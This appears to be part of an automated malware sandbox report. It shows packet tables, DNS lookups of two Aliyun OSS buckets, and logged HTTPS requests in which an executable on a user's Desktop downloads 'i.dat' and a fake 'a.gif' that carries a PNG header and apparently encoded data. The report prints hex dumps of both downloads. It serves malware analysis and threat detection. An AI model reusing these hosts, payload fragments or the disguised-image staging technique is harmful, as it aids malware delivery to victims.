                                                    Jan 6, 2025 04:44:09.015294075 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.015337944 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.021367073 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.021437883 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.021608114 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.021665096 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.025490046 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.025608063 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.025614023 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.025619030 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.025682926 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.031608105 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.031743050 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.031794071 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.031909943 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.033544064 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.033586025 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.039012909 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.039063931 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.039134979 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.039184093 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.042885065 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.043001890 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.043134928 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.043196917 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.049200058 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.049295902 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.049314976 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.049321890 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.049333096 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.049410105 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.053328037 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.053380013 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.143615961 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.143671036 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.146382093 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.146585941 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.148472071 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.148523092 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.150479078 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.150532961 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.154575109 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.154628038 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.156769991 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.156825066 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.161017895 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.161077023 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.163256884 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.163331032 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.165287971 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.165653944 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.169487953 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.169626951 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.171502113 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.171564102 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.175689936 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.175756931 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.177808046 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.177861929 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.180155039 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.180205107 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.184118986 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.184168100 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.186089039 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.186898947 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.190104008 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.190160036 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.192166090 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.192219973 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.196274996 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.196552038 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.198304892 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.198520899 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.200552940 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.200740099 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.204473019 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.204538107 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.206525087 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.206604004 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.208609104 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.208666086 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.209758043 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.209845066 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.211102962 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.211163998 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.213581085 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.213789940 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.214858055 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.214910030 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.217365980 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.217470884 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.218703032 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.218899012 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.219898939 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.219948053 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.222419977 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.222620964 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.234149933 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.234229088 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.234251022 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.234265089 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.234277964 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.234338045 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.236887932 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.236958981 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.236975908 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.237025023 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.243073940 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.243216991 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.243274927 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.243274927 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.243284941 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.243911982 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.249449015 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.249586105 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.249594927 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.249713898 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.255848885 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.255907059 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.255929947 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.255978107 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.262003899 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.262053013 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.262218952 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.262305021 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.475327969 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.475806952 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.687324047 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.687733889 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:10.111337900 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:10.111423016 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:10.943332911 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:10.943382025 CET49984443192.168.2.9118.178.60.9

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 6, 2025 04:43:26.350574017 CET5019753192.168.2.91.1.1.1
                                                    Jan 6, 2025 04:43:26.698380947 CET53501971.1.1.1192.168.2.9
                                                    Jan 6, 2025 04:43:58.880213976 CET5227253192.168.2.91.1.1.1
                                                    Jan 6, 2025 04:43:59.021681070 CET53522721.1.1.1192.168.2.9

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jan 6, 2025 04:43:26.350574017 CET192.168.2.91.1.1.10x47aaStandard query (0)hu5wd1.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                                                    Jan 6, 2025 04:43:58.880213976 CET192.168.2.91.1.1.10x266bStandard query (0)22mm.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jan 6, 2025 04:42:01.753597021 CET1.1.1.1192.168.2.90x526No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                    Jan 6, 2025 04:42:01.753597021 CET1.1.1.1192.168.2.90x526No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                    Jan 6, 2025 04:43:26.698380947 CET1.1.1.1192.168.2.90x47aaNo error (0)hu5wd1.oss-cn-beijing.aliyuncs.comsc-231t.cn-beijing.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                    Jan 6, 2025 04:43:26.698380947 CET1.1.1.1192.168.2.90x47aaNo error (0)sc-231t.cn-beijing.oss-adns.aliyuncs.comsc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                    Jan 6, 2025 04:43:26.698380947 CET1.1.1.1192.168.2.90x47aaNo error (0)sc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com39.103.20.26A (IP address)IN (0x0001)false
                                                    Jan 6, 2025 04:43:59.021681070 CET1.1.1.1192.168.2.90x266bNo error (0)22mm.oss-cn-hangzhou.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                    Jan 6, 2025 04:43:59.021681070 CET1.1.1.1192.168.2.90x266bNo error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                    Jan 6, 2025 04:43:59.021681070 CET1.1.1.1192.168.2.90x266bNo error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.9A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • hu5wd1.oss-cn-beijing.aliyuncs.com
                                                    • 22mm.oss-cn-hangzhou.aliyuncs.com

                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.94997439.103.20.264437580C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-06 03:43:27 UTC111OUTGET /i.dat HTTP/1.1
                                                    User-Agent: GetData
                                                    Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                    Cache-Control: no-cache
                                                    2025-01-06 03:43:28 UTC558INHTTP/1.1 200 OK
                                                    Server: AliyunOSS
                                                    Date: Mon, 06 Jan 2025 03:43:28 GMT
                                                    Content-Type: application/octet-stream
                                                    Content-Length: 512
                                                    Connection: close
                                                    x-oss-request-id: 677B5160A645AE3739483F13
                                                    Accept-Ranges: bytes
                                                    ETag: "3F830864D62708390D84A4629D88083D"
                                                    Last-Modified: Sun, 05 Jan 2025 09:01:14 GMT
                                                    x-oss-object-type: Normal
                                                    x-oss-hash-crc64ecma: 17523956267580149674
                                                    x-oss-storage-class: Standard
                                                    x-oss-ec: 0048-00000113
                                                    Content-Disposition: attachment
                                                    x-oss-force-download: true
                                                    Content-MD5: P4MIZNYnCDkNhKRinYgIPQ==
                                                    x-oss-server-time: 3
                                                    2025-01-06 03:43:28 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 58 45 05 47 23 76 69 28 5b 5b 05 4b 25 66 29 2e 47 44 47 40 27 6e 21 2c 45 55 59 42 21 31 6c 21 4e 4c 0e 40 6e 27 29 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 4e 52 52 56 25 6c 79 79 11 0c 4c 0e 6a 3f 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 5b 46 06 44 20 75 6a 2b 58 58 06 48 26 65 2a 2d 44 47 44 43 24 6d 22 2f 46 56 5a 41 22 32 6f 22 4d 4f 0d 41 6f 26 28 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 4f 53 53 57 24 6d 78 78 10 0d 4d 0f 6b 3e 21
                                                    Data Ascii: l%00XEG#vi([[K%f).GDG@'n!,EUYB!1l!NL@n')&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyLj? aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33[FD uj+XXH&e*-DGDC$m"/FVZA"2o"MOAo&('''''''''''''''''''''''''''''''''OSSW$mxxMk>!


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.94997539.103.20.264437580C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-06 03:43:29 UTC111OUTGET /a.gif HTTP/1.1
                                                    User-Agent: GetData
                                                    Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                    Cache-Control: no-cache
                                                    2025-01-06 03:43:29 UTC545INHTTP/1.1 200 OK
                                                    Server: AliyunOSS
                                                    Date: Mon, 06 Jan 2025 03:43:29 GMT
                                                    Content-Type: image/gif
                                                    Content-Length: 135589
                                                    Connection: close
                                                    x-oss-request-id: 677B5161F326DB3534E07E61
                                                    Accept-Ranges: bytes
                                                    ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                                    Last-Modified: Sun, 05 Jan 2025 09:00:15 GMT
                                                    x-oss-object-type: Normal
                                                    x-oss-hash-crc64ecma: 8642451798640735006
                                                    x-oss-storage-class: Standard
                                                    x-oss-ec: 0048-00000104
                                                    Content-Disposition: attachment
                                                    x-oss-force-download: true
                                                    Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                                    x-oss-server-time: 9
                                                    2025-01-06 03:43:29 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                    2025-01-06 03:43:29 UTC4096INData Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87
                                                    Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                                    2025-01-06 03:43:29 UTC4096INData Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92
                                                    Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                                    2025-01-06 03:43:30 UTC4096INData Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea
                                                    Data Ascii: c}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                                    2025-01-06 03:43:30 UTC4096INData Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55
                                                    Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
                                                    2025-01-06 03:43:30 UTC4096INData Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92
                                                    Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                                    2025-01-06 03:43:30 UTC4096INData Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17
                                                    Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
